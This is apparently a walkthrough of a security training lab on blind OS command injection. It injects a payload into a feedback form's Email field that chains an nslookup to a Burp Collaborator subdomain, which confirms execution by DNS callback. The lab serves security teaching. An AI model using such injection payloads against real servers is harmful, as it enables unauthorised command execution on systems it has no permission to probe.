Blind OS command injection with out-of-band interaction

Lab Description

Walkthrough

Step 1: Understanding the Feedback Functionality

The Submit Feedback page contains four input fields:

• Name

• Email

• Subject

• Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request

Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.

Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload

In the Email field, inject the following payload:

||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.

Payload Breakdown:

• ||: Ends the existing shell command.

• nslookup: A command to perform DNS lookups.

• x.BURP-COLLABORATOR-SUBDOMAIN: Replaces x with the generated subdomain for monitoring.

Submit the request with the modified payload.

• The server responds with 200 OK, indicating the payload was executed.

Step 4: Verifying Out-of-Band Interaction

Switch to the Burp Collaborator tab and click Poll now.

• Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?

When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.